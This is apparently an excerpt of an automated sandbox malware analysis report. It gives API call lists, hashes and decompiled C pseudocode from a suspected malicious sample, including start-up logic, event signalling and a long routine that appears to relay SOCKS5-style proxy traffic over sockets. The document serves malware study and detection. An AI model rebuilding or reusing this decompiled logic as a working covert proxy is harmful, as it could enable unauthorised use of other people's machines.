    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Heap$CreateProcess
    • String ID:
    • API String ID: 1042935442-0
    • Opcode ID: 90d3d3278fdc6ba10057cf4e76813a3fdebfa55917ce61177f0e5148043ccfbe
    • Instruction ID: 8550443e97d32f920292b506c3e87fe41f1accf861031873df9eb046ec498dea
    • Opcode Fuzzy Hash: 90d3d3278fdc6ba10057cf4e76813a3fdebfa55917ce61177f0e5148043ccfbe
    • Instruction Fuzzy Hash: F1D0523895EB419FF7B1DB3CF84E7403AA4A708B02F90028DE402D5288EEB44150C722
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 94%
    			E012C226C(void* __edi) {
    				signed int _v5;
    				char _v6;
    				int _v12;
    				short _v52;
    				short _v564;
    				void* _t35;
    				signed int _t46;
    				void* _t59;
    				signed int _t69;
    				short* _t75;
    				signed int _t76;
    				void* _t77;
    				signed int _t78;
    				signed int _t81;
    				signed int _t83;
    				void* _t84;
    
    				_t84 = __edi;
    				_v5 = 0;
    				_v6 = 0;
    				_t35 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
    				if(_t35 == 0) {
    					L9:
    					GetModuleFileNameW(0,  &_v564, 0x104);
    					_t77 = 0x5c;
    					 *((short*)(L012B1ABE( &_v564, _t77) + 2)) = 0;
    					_t78 = L"o.d";
    					L012B101E( &_v564, 6);
    					if((L012B1168( &_v564, _t78) & _t78) == 0xffffffff) {
    						_t69 = 0xa;
    						memset( &_v52, 0xbadbad, _t69 << 2);
    						__imp__SHGetFolderPathW(0, 0x1a, 0, 0,  &_v564, _t84); // executed
    						_t81 = L"\\oemfpc.dat";
    						L012B101E( &_v564, 0x16);
    						if((L012B1168( &_v564, _t81) & _t81) != 0xffffffff) {
    							L012B12B7( &_v564,  &_v52, 0x10);
    							_t59 = OpenEventW(0x1f0003, 0,  &_v52);
    							if(_t59 != 0xffffffff) {
    								SetEvent(_t59);
    								L012B1640( &_v564);
    								Sleep(0x1388);
    							}
    						}
    					}
    					if(L012B18C0(0) != 0) {
    						L012B1910();
    						if(_v6 == 0) {
    							_t46 = E012C1FF5(__eflags, 1);
    							_v5 = _t46;
    						} else {
    							L012B14BA();
    							_v5 = L012B14B5();
    							_t46 = L012B19D8();
    						}
    						if(_v5 == 0 || ( *0x12dc738 & 0x00000002) == 0) {
    							goto L20;
    						} else {
    							Sleep(0xffffffff);
    							return _t46;
    						}
    					}
    					L20:
    					__eflags = _v5;
    					_t32 = _v5 == 0;
    					__eflags = _t32;
    					ExitProcess(0 | _t32);
    				}
    				_t83 = 0;
    				if(_v12 <= 0) {
    					L8:
    					LocalFree(_t35);
    					goto L9;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					_t75 =  *((intOrPtr*)(_t35 + _t83 * 4));
    					if(_t75 != 0 &&  *_t75 == 0x2d) {
    						_t76 =  *(_t75 + 2) & 0x0000ffff;
    						if(_t76 != 0x66 && _t76 == 0x76) {
    							_v6 = 1;
    						}
    					}
    					_t83 = _t83 + 1;
    				} while (_t83 < _v12);
    				goto L8;
    			}




















    APIs
    • GetCommandLineW.KERNEL32(?), ref: 012C2282
    • CommandLineToArgvW.SHELL32(00000000), ref: 012C2289
    • LocalFree.KERNEL32(00000000), ref: 012C22C0
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 012C22D3
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000006), ref: 012C2336
    • OpenEventW.KERNEL32(001F0003,00000000,?,00000010,?,00000006), ref: 012C237B
    • SetEvent.KERNEL32(00000000,?,00000006), ref: 012C2387
    • Sleep.KERNEL32(00001388,?,00000006), ref: 012C239D
    • Sleep.KERNEL32(000000FF,00000001,00000006), ref: 012C23E6
    • ExitProcess.KERNEL32 ref: 012C23F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CommandEventLineSleep$ArgvExitFileFolderFreeLocalModuleNameOpenPathProcess
    • String ID: \oemfpc.dat$o.d
    • API String ID: 1607201041-971870140
    • Opcode ID: 5d168324c18d321fbfb296612b51adf5a4832f390f628f67f4498154c42767bb
    • Instruction ID: b4327f06a358e9c742a8ab91df6cd7be8c119b97bae56a1b1f06590b25c2576f
    • Opcode Fuzzy Hash: 5d168324c18d321fbfb296612b51adf5a4832f390f628f67f4498154c42767bb
    • Instruction Fuzzy Hash: DC41E831930245EAEB24EBB8ECE9AFD7779AF11710F14469DE301960D1DF784A88D721
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 53%
    			E012BCB93(intOrPtr __ecx) {
    				char _v5;
    				intOrPtr _v12;
    				short _v116;
    				char _v192;
    				char _v212;
    				short _v732;
    				intOrPtr* _t32;
    
    				_t17 =  &_v732;
    				_v12 = __ecx;
    				_v5 = 0;
    				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17); // executed
    				if(_t17 != 0) {
    					L8:
    					L012B15F5(_t17, _v12, 0, 0x10);
    				} else {
    					PathAddBackslashW( &_v732);
    					_t32 = __imp__GetVolumeNameForVolumeMountPointW;
    					while(1) {
    						_t17 =  *_t32( &_v732,  &_v212, 0x64); // executed
    						if(_t17 != 0) {
    							break;
    						}
    						PathRemoveBackslashW( &_v732);
    						if(PathRemoveFileSpecW( &_v732) == 0) {
    							goto L8;
    						} else {
    							PathAddBackslashW( &_v732);
    							continue;
    						}
    						goto L9;
    					}
    					if(_v192 != 0x7b) {
    						goto L8;
    					} else {
    						_v116 = 0;
    						_t17 =  &_v192;
    						__imp__CLSIDFromString(_t17, _v12);
    						if(_t17 != 0) {
    							goto L8;
    						} else {
    							_v5 = 1;
    						}
    					}
    				}
    				L9:
    				return _v5;
    			}











    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 012BCBB3
    • PathAddBackslashW.SHLWAPI(?), ref: 012BCBCA
    • PathRemoveBackslashW.SHLWAPI(?), ref: 012BCBDB
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 012BCBE8
    • PathAddBackslashW.SHLWAPI(?), ref: 012BCBF9
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 012BCC0B
    • CLSIDFromString.OLE32(0000007B,?), ref: 012BCC2B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
    • String ID: {
    • API String ID: 613918483-366298937
    • Opcode ID: 3be251aef2067e84ce914110bb73a5c17f519acd2fb9a9ce446812f934134da6
    • Instruction ID: e4d234af895ff2c31d54c3ba0fb6cbb6a94543c1b5ff154b3951b5a5cfc9b480
    • Opcode Fuzzy Hash: 3be251aef2067e84ce914110bb73a5c17f519acd2fb9a9ce446812f934134da6
    • Instruction Fuzzy Hash: 351181B1D1425DAADF209BA4EC8CFDE7BBCAB04390F0044A6A205F3040EB709A958F24
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 70 12b9700-12b9721 CreateFileW 71 12b9723-12b972f call 12b19fb CloseHandle 70->71 72 12b9735-12b973c 70->72 71->72
    C-Code - Quality: 100%
    			E012B9700(WCHAR* __ecx, signed int __edx) {
    				void* _t2;
    				signed int _t6;
    				signed int _t7;
    				signed int _t10;
    				signed int _t12;
    				void* _t13;
    
    				_t10 = __edx;
    				_t7 = _t6 | 0xffffffff;
    				_t12 = _t7; // executed
    				_t2 = CreateFileW(__ecx, 0x80000000, 7, 0, 3, 0, 0); // executed
    				_t13 = _t2;
    				if(_t13 != _t7) {
    					_t12 = L012B19FB(_t13);
    					_t7 = _t10;
    					CloseHandle(_t13);
    				}
    				return _t12;
    			}










    APIs
    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 012B9717
    • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 012B972F
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseCreateFileHandle
    • String ID:
    • API String ID: 3498533004-0
    • Opcode ID: 6f498a0c013a5905698c45d032835c6bdce522cea3f4b0a42e9b053cc91c485e
    • Instruction ID: 695dba1ac15847fa45ee9a4d47fea84e6f1c0175f52f3ba8bffedf0900c74f07
    • Opcode Fuzzy Hash: 6f498a0c013a5905698c45d032835c6bdce522cea3f4b0a42e9b053cc91c485e
    • Instruction Fuzzy Hash: A2E046A6B161216FE2242939AC88EBA1A9DD789671F250629BA16E7284CD648C060261
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 97%
    			E012C1DD2(signed int __ecx, void* __edx, void* __edi, void* __esi) {
    				void* __ebx;
    				signed int _t12;
    				signed int _t15;
    				signed int _t16;
    				long _t17;
    				signed int _t18;
    				signed int _t19;
    				signed int _t20;
    				signed int _t25;
    				signed char _t27;
    				void* _t32;
    				void* _t33;
    
    				_t33 = __esi;
    				_t32 = __edi;
    				_t27 = __ecx;
    				if((__ecx & 0x00000001) == 0) {
    					 *0x12dc738 =  *0x12dc738 & 0x00000000;
    				}
    				if(E012C1097(_t32, _t27) != 0) {
    					L012B1654(E012B1C4E(E012B10A5(E012B18F2(0x80000)))); // executed
    					L012B143D(); // executed
    					_t12 = E012C11C5(_t27, 1);
    					__eflags = _t12;
    					if(_t12 == 0) {
    						goto L3;
    					} else {
    						_push(_t27);
    						__eflags = E012C1246();
    						if(__eflags == 0) {
    							goto L3;
    						} else {
    							_t15 = E012C12F0(1, _t33, __eflags);
    							__eflags = _t15;
    							if(_t15 == 0) {
    								goto L3;
    							} else {
    								_t16 = E012C132C(_t15, _t27);
    								__eflags = _t16;
    								if(_t16 == 0) {
    									goto L3;
    								} else {
    									_t17 = GetCurrentProcessId();
    									 *0x12dca04 =  *0x12dca04 & 0x00000000;
    									 *0x12dca00 = _t17;
    									_t18 = E012C138F();
    									__eflags = _t18;
    									if(_t18 == 0) {
    										goto L3;
    									} else {
    										_t19 = E012C1D0F(_t32, _t27);
    										__eflags = _t19;
    										if(_t19 == 0) {
    											goto L3;
    										} else {
    											_t20 = E012C1468(_t27);
    											__eflags = _t20;
    											if(_t20 == 0) {
    												goto L3;
    											} else {
    												E012B1014();
    												E012B12C1();
    												E012B1BD6();
    												E012B148D();
    												_t25 = E012C1D52(_t27, __eflags);
    												__eflags = _t25;
    												_t4 = _t25 != 0;
    												__eflags = _t4;
    												return _t25 & 0xffffff00 | _t4;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				} else {
    					L3:
    					return 0;
    				}
    			}
















    APIs
      • Part of subcall function 012B18F2: HeapCreate.KERNELBASE(00000000,?,00000000), ref: 012B3BAE
      • Part of subcall function 012B18F2: GetProcessHeap.KERNEL32(?,00000000), ref: 012B3BBD
      • Part of subcall function 012B1C4E: InitializeCriticalSection.KERNEL32(012DCD98), ref: 012C2BBA
    • GetCurrentProcessId.KERNEL32 ref: 012C1E37
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: HeapProcess$CreateCriticalCurrentInitializeSection
    • String ID:
    • API String ID: 1756877647-0
    • Opcode ID: cbede552a07a219b6d51011ba8ad2d7f774ba8147bb83f735c7d63b0dcb93cd2
    • Instruction ID: 5c1807825b97d08b11c3610d493d5ce383ba99176c2c56a5e183ae7d847f59f0
    • Opcode Fuzzy Hash: cbede552a07a219b6d51011ba8ad2d7f774ba8147bb83f735c7d63b0dcb93cd2
    • Instruction Fuzzy Hash: 3D0171A0131393C2EE20BBF479E73F9175A5F32B96F140ACC5B4167187CB2990399122
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 127 12b6814-12b6836 WSAStartup
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 012B6829
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: deeb79aa540c86ab5620d05d02eda0928124bde33627b947fcf0830214d2e6bc
    • Instruction ID: 38831a8b6f168f427fb364770a7ee79ec9a54ac88762458e80e55700e5d45fa4
    • Opcode Fuzzy Hash: deeb79aa540c86ab5620d05d02eda0928124bde33627b947fcf0830214d2e6bc
    • Instruction Fuzzy Hash: 3BC08C319802185AEB106270E90FAA5736C9706B44F0002A42612C20CAA2A0940E0661
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 57%
    			E012C976D(intOrPtr __ecx, signed int __edx, void* __eflags) {
    				signed int _t268;
    				signed int _t272;
    				signed int _t278;
    				signed int _t280;
    				signed int _t281;
    				void* _t285;
    				signed int _t287;
    				signed int _t289;
    				signed int _t292;
    				signed int _t297;
    				signed int _t299;
    				signed int _t312;
    				signed int _t314;
    				intOrPtr _t315;
    				void* _t316;
    				signed int _t317;
    				signed int _t319;
    				signed int _t320;
    				signed int _t321;
    				signed int _t326;
    				void* _t332;
    				void* _t341;
    				signed int _t344;
    				void* _t345;
    				signed short _t353;
    				signed int _t359;
    				signed int _t361;
    				signed char _t362;
    				signed int _t368;
    				signed int _t369;
    				signed short _t373;
    				signed int _t384;
    				signed int _t385;
    				signed int _t387;
    				signed int _t390;
    				signed int _t391;
    				signed int _t394;
    				void* _t396;
    				signed char _t400;
    				void* _t402;
    				void* _t403;
    				signed int _t404;
    				signed int _t405;
    				intOrPtr _t419;
    				signed int _t422;
    				intOrPtr _t449;
    				intOrPtr _t457;
    				void* _t460;
    				signed char _t483;
    				signed char _t487;
    				signed int _t492;
    				signed int _t493;
    				signed int _t494;
    				signed int _t496;
    				signed int _t497;
    				void* _t498;
    				void* _t499;
    				signed int _t500;
    				signed int _t501;
    				signed int _t505;
    				intOrPtr _t506;
    				void* _t507;
    				signed int _t509;
    				void* _t510;
    				void* _t512;
    
    				_t510 = _t512 - 0x78;
    				 *(_t510 + 0x68) = __edx;
    				 *((intOrPtr*)(_t510 + 0x70)) = __ecx;
    				_t400 = 0 | L012B185C(__ecx) == 0x00000017;
    				 *(_t510 + 0x50) = _t400;
    				if(L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x77, 1,  *(_t510 + 0x68)) == 0 ||  *(_t510 + 0x77) == 0 || L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x2f0,  *(_t510 + 0x77) & 0x000000ff,  *(_t510 + 0x68)) == 0) {
    					L41:
    					_t268 = 0;
    					__eflags = 0;
    					goto L42;
    				} else {
    					_t272 = L012B11EA(_t510 - 0x2f0, 0,  *(_t510 + 0x77) & 0x000000ff);
    					asm("sbb eax, eax");
    					_t492 = 2;
    					 *(_t510 + 0x60) = ( ~_t272 & 0xffff0100) + 0x0000ff05 & 0x0000ffff;
    					if(L012B182A(( ~_t272 & 0xffff0100) + 0x0000ff05 & 0x0000ffff,  *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x60, _t492) == 0) {
    						goto L41;
    					}
    					if( *(_t510 + 0x60) != 0xff05) {
    						 *((char*)(_t510 + 0x6c)) = 0;
    						_t278 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x40, 4,  *(_t510 + 0x68));
    						__eflags = _t278;
    						if(_t278 == 0) {
    							goto L41;
    						}
    						__eflags =  *((char*)(_t510 + 0x40)) - 5;
    						if( *((char*)(_t510 + 0x40)) != 5) {
    							goto L41;
    						} else {
    							__eflags = _t400 & 0x00000001;
    							if((_t400 & 0x00000001) == 0) {
    								 *(_t510 + 0x30) = _t492;
    								 *(_t510 + 0x34) = 0x17;
    							} else {
    								 *(_t510 + 0x30) = 0x17;
    								 *(_t510 + 0x34) = _t492;
    							}
    							_t505 = 0;
    							_t280 = ( *(_t510 + 0x43) & 0x000000ff) - 1;
    							__eflags = _t280;
    							 *(_t510 + 0x48) = 0;
    							_t402 = 0x10;
    							if(_t280 == 0) {
    								_t281 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x28, 4,  *(_t510 + 0x68));
    								__eflags = _t281;
    								if(_t281 == 0) {
    									goto L41;
    								}
    								_t505 = L012B1C17(_t402);
    								 *(_t510 + 0x48) = _t505;
    								__eflags = _t505;
    								if(_t505 != 0) {
    									 *_t505 = _t492;
    									_push(4);
    									_push(_t510 + 0x28);
    									_t77 = _t505 + 4; // 0x4
    									_t285 = _t77;
    									L38:
    									_push(_t285);
    									L012B1947();
    									L39:
    									_t287 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x3c, _t492,  *(_t510 + 0x68));
    									__eflags = _t287;
    									if(_t287 != 0) {
    										_t493 = _t492 | 0xffffffff;
    										__eflags =  *((char*)(_t510 + 0x6c));
    										 *(_t510 + 0x77) = 1;
    										if( *((char*)(_t510 + 0x6c)) != 0) {
    											L142:
    											L012B1933( *(_t510 + 0x48));
    											_t268 =  *(_t510 + 0x77);
    											__eflags = _t268 - 1;
    											if(_t268 == 1) {
    												__eflags =  *((char*)(_t510 + 0x6c));
    												if( *((char*)(_t510 + 0x6c)) != 0) {
    													_push( *(_t510 + 0x50));
    													_push( *((intOrPtr*)(_t510 + 0x6c)));
    													_push(0xffffffff);
    													_push( *((intOrPtr*)(_t510 + 0x70)));
    													_t289 = E012C9668();
    													__eflags = _t289;
    													_t268 = _t289 & 0xffffff00 | _t289 != 0x00000000;
    												}
    											}
    											goto L42;
    										}
    										 *((short*)(_t505 + 2)) =  *((intOrPtr*)(_t510 + 0x3c));
    										_t292 = ( *(_t510 + 0x41) & 0x000000ff) - 1;
    										__eflags = _t292;
    										if(_t292 == 0) {
    											_t506 = L012B173F(_t505);
    											__eflags = _t506 - _t493;
    											if(_t506 != _t493) {
    												L012B17B2(_t506, 1);
    												_push( *(_t510 + 0x50));
    												_push(0);
    												_push(_t506);
    												_push( *((intOrPtr*)(_t510 + 0x70)));
    												_t295 = E012C9668();
    												__eflags = _t295 - 1;
    												if(_t295 != 1) {
    													__eflags = _t295 - _t493;
    													if(_t295 != _t493) {
    														 *(_t510 + 0x77) = 0;
    													} else {
    														 *((char*)(_t510 + 0x6c)) = 1;
    													}
    												} else {
    													_t295 = L012B108C( *((intOrPtr*)(_t510 + 0x70)), _t506);
    												}
    												_t419 = _t506;
    												L141:
    												L012B1B22(_t295, _t419);
    												goto L142;
    											}
    											L134:
    											 *((char*)(_t510 + 0x6c)) = 5;
    											goto L142;
    										}
    										_t297 = _t292 - 1;
    										__eflags = _t297;
    										if(_t297 == 0) {
    											__eflags =  *_t505 - 0x17;
    											 *((short*)(_t505 + 2)) = 0;
    											if( *_t505 != 0x17) {
    												_t239 = _t505 + 4;
    												 *_t239 =  *(_t505 + 4) & 0;
    												__eflags =  *_t239;
    											} else {
    												_t238 = _t505 + 8; // 0x8
    												L012B19F6(_t238, _t402);
    											}
    											_t299 = L012B187A(_t505, 1);
    											 *(_t510 + 0x60) = _t299;
    											__eflags = _t299 - _t493;
    											if(_t299 == _t493) {
    												goto L134;
    											} else {
    												_push( *(_t510 + 0x50));
    												_push(0);
    												_push(_t299);
    												_push( *((intOrPtr*)(_t510 + 0x70)));
    												_t507 = E012C9668();
    												__eflags = _t507 - 1;
    												if(_t507 != 1) {
    													_t422 =  *(_t510 + 0x60);
    													L130:
    													L012B1B22(_t300, _t422);
    													__eflags = _t507 - 0xffffffff;
    													if(_t507 == 0xffffffff) {
    														L119:
    														 *((char*)(_t510 + 0x6c)) = 1;
    														goto L142;
    													}
    													__eflags = _t507 - 1;
    													if(_t507 != 1) {
    														 *(_t510 + 0x77) = 0;
    													}
    													goto L142;
    												}
    												_t494 = L012B17D0(_t510 + 0x60, 1, 0, 0, 0, _t510 + 0x70, _t300);
    												L012B1B22(_t303,  *(_t510 + 0x60));
    												__eflags = _t494 - 0xffffffff;
    												if(_t494 == 0xffffffff) {
    													goto L119;
    												}
    												L012B17B2(_t494, 1);
    												_push( *(_t510 + 0x50) | 0x00000002);
    												_push(0);
    												_push(_t494);
    												_push( *((intOrPtr*)(_t510 + 0x70)));
    												_t507 = E012C9668();
    												__eflags = _t507 - 1;
    												if(_t507 == 1) {
    													_t300 = L012B108C( *((intOrPtr*)(_t510 + 0x70)), _t494);
    												}
    												_t422 = _t494;
    												goto L130;
    											}
    										}
    										__eflags = _t297 == 1;
    										if(_t297 == 1) {
    											 *(_t510 + 0x2c) = 0x80;
    											 *(_t510 + 0x24) = 0x80;
    											_t312 = _t510 - 0x5c;
    											__imp__#6( *((intOrPtr*)(_t510 + 0x70)), _t312, _t510 + 0x2c);
    											__eflags = _t312;
    											if(_t312 != 0) {
    												goto L119;
    											}
    											_t314 = _t510 - 0x370;
    											__imp__#5( *((intOrPtr*)(_t510 + 0x70)), _t314, _t510 + 0x24);
    											__eflags = _t314;
    											if(_t314 != 0) {
    												goto L119;
    											}
    											__eflags =  *(_t510 - 0x5c) - 0x17;
    											 *(_t510 - 0x5a) = _t314;
    											if( *(_t510 - 0x5c) == 0x17) {
    												 *(_t510 - 0x44) =  *(_t510 - 0x44) & _t314;
    												_t99 = _t510 - 0x58;
    												 *_t99 =  *(_t510 - 0x58) & _t314;
    												__eflags =  *_t99;
    											}
    											_t315 = E012B1929(_t510 - 0x5c);
    											 *((intOrPtr*)(_t510 + 0x58)) = _t315;
    											__eflags = _t315 - _t493;
    											if(_t315 == _t493) {
    												goto L119;
    											} else {
    												_t403 = 0xffff;
    												_t509 = L012B1C17(0xffff);
    												__eflags = _t509;
    												if(_t509 != 0) {
    													_push( *(_t510 + 0x50));
    													_push(0);
    													_push( *((intOrPtr*)(_t510 + 0x58)));
    													_push( *((intOrPtr*)(_t510 + 0x70)));
    													_t316 = E012C9668();
    													__eflags = _t316 - 1;
    													if(_t316 != 1) {
    														__eflags = _t316 - _t493;
    														if(_t316 != _t493) {
    															 *(_t510 + 0x77) = 0;
    														} else {
    															 *((char*)(_t510 + 0x6c)) = 1;
    														}
    														L117:
    														_t295 = L012B1933(_t509);
    														L118:
    														_t419 =  *((intOrPtr*)(_t510 + 0x58));
    														goto L141;
    													}
    													_t317 = 0;
    													 *((intOrPtr*)(_t510 - 0x16c)) =  *((intOrPtr*)(_t510 + 0x70));
    													 *((intOrPtr*)(_t510 - 0x168)) =  *((intOrPtr*)(_t510 + 0x58));
    													 *(_t510 + 0x5c) = _t493;
    													 *(_t510 + 0x38) = 0;
    													 *(_t510 + 0x54) = 0;
    													 *(_t510 + 0x60) = 0;
    													 *((intOrPtr*)(_t510 - 0x170)) = 2;
    													 *(_t510 - 0x164) = _t493;
    													__imp__#18(0, _t510 - 0x170, 0, 0, 0);
    													__eflags = 0;
    													if(0 <= 0) {
    														L113:
    														L012B1B22(_t317,  *(_t510 + 0x5c));
    														goto L117;
    													}
    													while(1) {
    														_t317 = L012B1BEF( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x170);
    														__eflags = _t317;
    														if(_t317 == 0) {
    															goto L61;
    														}
    														__imp__#16( *((intOrPtr*)(_t510 + 0x70)), _t509, _t403, 0);
    														__eflags = _t317;
    														if(_t317 <= 0) {
    															goto L113;
    														}
    														L61:
    														 *(_t510 + 0x68) = 0x80;
    														_t319 = L012B1BEF( *((intOrPtr*)(_t510 + 0x58)), _t510 - 0x170);
    														__eflags = _t319;
    														if(_t319 == 0) {
    															L103:
    															__eflags =  *(_t510 + 0x5c) - 0xffffffff;
    															if( *(_t510 + 0x5c) == 0xffffffff) {
    																L112:
    																_t320 =  *(_t510 + 0x5c);
    																__eflags = _t320 - 0xffffffff;
    																 *(_t510 - 0x164) = _t320;
    																_t317 = 0;
    																 *((intOrPtr*)(_t510 - 0x170)) = (0 | _t320 != 0xffffffff) + 2;
    																 *((intOrPtr*)(_t510 - 0x16c)) =  *((intOrPtr*)(_t510 + 0x70));
    																 *((intOrPtr*)(_t510 - 0x168)) =  *((intOrPtr*)(_t510 + 0x58));
    																__imp__#18(0, _t510 - 0x170, 0, 0, 0);
    																__eflags = 0;
    																if(0 > 0) {
    																	_t403 = 0xffff;
    																	continue;
    																}
    																goto L113;
    															}
    															_t321 = L012B1BEF( *(_t510 + 0x5c), _t510 - 0x170);
    															__eflags = _t321;
    															if(_t321 == 0) {
    																goto L112;
    															}
    															_t404 =  *(_t510 + 0x38);
    															_t326 = _t404 + _t509;
    															__imp__#17( *(_t510 + 0x5c), _t326, 0xffff - _t404, 0, _t510 - 0x5c, _t510 + 0x68);
    															_t496 = _t326;
    															__eflags = _t496;
    															if(_t496 > 0) {
    																L107:
    																 *_t509 = 0;
    																 *((char*)(_t509 + 2)) = 0;
    																 *(_t510 - 0x5c) - 0x17 =  *(_t510 + 0x54) - 0x17;
